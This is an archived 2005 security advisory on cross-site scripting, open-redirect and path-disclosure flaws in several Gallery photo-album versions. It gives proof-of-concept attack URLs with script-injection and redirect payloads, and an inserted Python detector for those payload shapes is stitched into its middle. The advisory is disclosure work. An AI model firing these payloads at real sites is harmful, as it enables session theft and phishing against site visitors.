
Gallery134.txt

Date: 18 Jan 2005 00:00:00
Reported by: Rafel Ivgi
Type: packetstorm
Source: packetstormsecurity.com

Gallery has Cross Site Scripting vulnerability allowing remote script execution on user devices.

Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application: Gallery  
Vendors: http://gallery.sourceforge.net  
Versions: v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha  
Platforms: Windows  
Bug: Cross Site Scripting Vulnerability  
Exploitation: Remote With Browser  
Date: 17 Jan 2005  
Author: Rafel Ivgi, The-Insider  
E-Mail: [email protected]  
Website: http://theinsider.deep-ice.com  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
1) Introduction  
2) Bugs  
3) The Code  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===============  
1) Introduction  
===============  
  
Gallery is open to a Cross Site Scripting vulnerability, allowing a remote  
attacker to inject and execute scripts on the user’s machine while visiting  
a remote gallery.  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
======  
2) Bug  
======  
  
Gallery v1.3.4-pl1 contains a vulnerability inside ‘add_comment.php’ in the  
‘index’ field. The injection can be done using the classical tag closing:  
"><script>alert()</script>  
  
For Example:  
http://<valid host>/gallery/add_comment.php?set_albumName=Eros&index=1"><script>alert()</script>  
  
  
Gallery v1.3.4-pl1 also contains a vulnerability inside ‘slideshow_low.php’  
in ALL the fields. The ‘slideshow_low.php’ contains the following form  
fields:  
set_albumName  
slide_index  
slide_full  
slide_loop  
slide_pause  
slide_dir  
  
The injection can be done using the classical tag closing:  
"><script>alert()</script>  
  
For Example:  
http://<valid host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1  
  
Gallery v1.3.4-pl1 also has a vulnerability inside ‘search.php’ in the  
‘username’ field. The injection can be done using hex encoded tag closing  
and an HTML event:  
%22%20onactivate%3D"alert%28%29"  
  
For Example:  
http://<valid host>/gallery/search.php?searchstring=%22%20onactivate%3D"alert%28%29"  
  
  
  
Gallery v1.4.4-pl2 contains a vulnerability inside ‘login.php’ in the  
‘username’ field. The injection can be done using hex encoded tag closing  
and an HTML event:  
%22%20onactivate%3D"alert%28%29"  
  
For Example:  
http://<valid host>/gallery/login.php?gallery_popup=true&username=/*%22*/%20onactivate%3Dalert%28%29%3e  
  
This version of Gallery also has an open redirection, which is a security  
risk because an attacker can send someone a link with a redirection to his  
evil host name, or cause the user to commit an attack or waste a target’s  
resources.  
  
For Example:  
http://<valid host>/gallery/do_command.php?set_fullOnly=on&return=<escape encoded evil host name>&cmd=  
  
All the vulnerabilities described above can be used to remotely call a  
JavaScript file. The injected JavaScript code is responsible for:  
Automatic launching of malicious code (remote compromise by I.E exploits).  
Identity theft using a spoofed re-login window (only for galleries with  
login).  
  
Gallery v2.0 Alpha contains a vulnerability inside ‘login.php’ in the  
‘g2_form[subject]’ field. The injection can be done using an inline  
javascript protocol call:  
javascript:alert()  
  
For Example:  
http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2_form[formName]=AddComment&g2_itemId=<valid item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview]=preview  
  
Gallery v2.0 Alpha contains another vulnerability inside ‘main.php’ in the  
‘g2_subView’ parameter. It is possible to replace any valid subView value,  
such as comment:ShowComments, with the admin value core:UserAdmin. This  
causes the gallery to wait 30 seconds and then print out the full path of  
the gallery on the server.  
  
For Example:  
http://<valid host>/g2/main.php?g2_return= http://<valid host>/main.php%3Fg2_view%3Dcore%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3D< any valid/invalid session id such as: be869b98355e8d445c8ec8f97cb343da>&g2_view=core:UserAdmin&g2_subView=core:UserAdmin  
  
Then the following data will be printed out to the attacker:  
Fatal error: Maximum execution time of 30 seconds exceeded in /mnt/1/<name>/www/<host>/g2/modules/core/UserAdmin.inc on line 55  
  
Second time:  
Fatal error: Maximum execution time of 30 seconds exceeded in /mnt/1/<name>/www/<host>/g2/modules/core/classes/GalleryUtilities.class on line 596  
  
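As an added example (not part of the advisory, and not Gallery's own code), the following Python detector scans request URLs for the injection styles described above (quote-and-bracket tag closing, a hex-encoded on* event handler, a javascript: protocol call) and for a `return`/`g2_return` value pointing at a host other than the gallery itself; `gallery.example` and `external.example` are constructed hosts.

```python
import re
from html import unescape
from urllib.parse import parse_qsl, unquote, urlsplit

# Signatures for the three injection styles in the advisory (patterns are
# constructed for this example): a quote-and-bracket attribute breakout,
# a quote or comment followed by an on* handler, and a javascript: URL.
XSS_PATTERNS = [
    ("tag-closing", re.compile(r"""['"]\s*>""")),
    ("event-handler", re.compile(r"""[\s'"/*]on[a-z]+\s*=""", re.I)),
    ("js-protocol", re.compile(r"javascript\s*:", re.I)),
]
# Parameters Gallery 1.x/2.x use to send the browser elsewhere (from the advisory).
REDIRECT_PARAMS = {"return", "g2_return"}


def decode(value: str) -> str:
    """Strip one extra layer of percent-encoding and HTML entities so that a
    double-encoded payload (%2522 -> %22 -> ") is inspected in its final form."""
    return unescape(unquote(value))


def scan_request(url: str) -> list:
    """Return (parameter, finding) pairs for one request URL, in parameter order."""
    parts = urlsplit(url)
    findings = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = decode(raw)  # parse_qsl already decoded once
        for label, pattern in XSS_PATTERNS:
            if pattern.search(value):
                findings.append((name, label))
        if name in REDIRECT_PARAMS:
            # A redirect target on a host other than the gallery's own is an
            # open redirect; relative paths and same-host URLs are left alone.
            target = urlsplit(value.strip())
            if target.netloc and target.netloc.lower() != parts.netloc.lower():
                findings.append((name, "open-redirect"))
    return findings


def scan_requests(urls) -> dict:
    """Map each flagged URL to its findings; clean requests are omitted."""
    return {u: f for u in urls if (f := scan_request(u))}


# Constructed sample requests mirroring the advisory's payload shapes.
SAMPLE_REQUESTS = [
    'http://gallery.example/gallery/add_comment.php?set_albumName=Eros&index=1"><script>alert()</script>',
    "http://gallery.example/gallery/login.php?gallery_popup=true&username=/*%22*/%20onactivate%3Dalert%28%29%3e",
    "http://gallery.example/g2/main.php?g2_controller=comment:AddComment&g2_itemId=42&g2_form[subject]=[img]javascript:alert()[/img]",
    "http://gallery.example/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fexternal.example%2F&cmd=",
    "http://gallery.example/gallery/search.php?searchstring=sunset",
]

if __name__ == "__main__":
    for url, findings in scan_requests(SAMPLE_REQUESTS).items():
        print(url, "->", findings)
```

Run it over the query strings of a web server access log to triage hits against the endpoints named above; a same-host `g2_return` is deliberately not flagged.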
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===========  
3) The Code  
===========  
  
Gallery v1.3.4-pl1  
http://<host>/gallery/add_comment.php?set_albumName=Eros&index=1"><script>alert()</script>  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3"><script>alert()</script>&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0"><script>alert()</script>&slide_pause=3&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0&slide_pause=3"><script>alert()</script>&slide_dir=1  
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1"><script>alert()</script>  
http://<host>/gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"  
  
Gallery v1.4.4-pl2  
http://<host>/gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*/%20onactivate%3Dalert%28%29%3e<plaintext>  
http://<host>/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww.google.com&cmd=  
  
Gallery v2.0 Alpha  
  
1) http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2_form[formName]=AddComment&g2_itemId=<valid item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview]=preview  
  
2) http://<host>/g2/main.php?g2_return=<host>%2Fg2%2Fmain.php%3Fg2_view%3Dcore%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb343da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&g2_view=core:UserAdmin&g2_subView=core:UserAdmin  
  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
---  
Rafel Ivgi, The-Insider  
http://theinsider.deep-ice.com  
  
"Scripts and Codes will make me D.O.S , but they will never HACK me."  
  
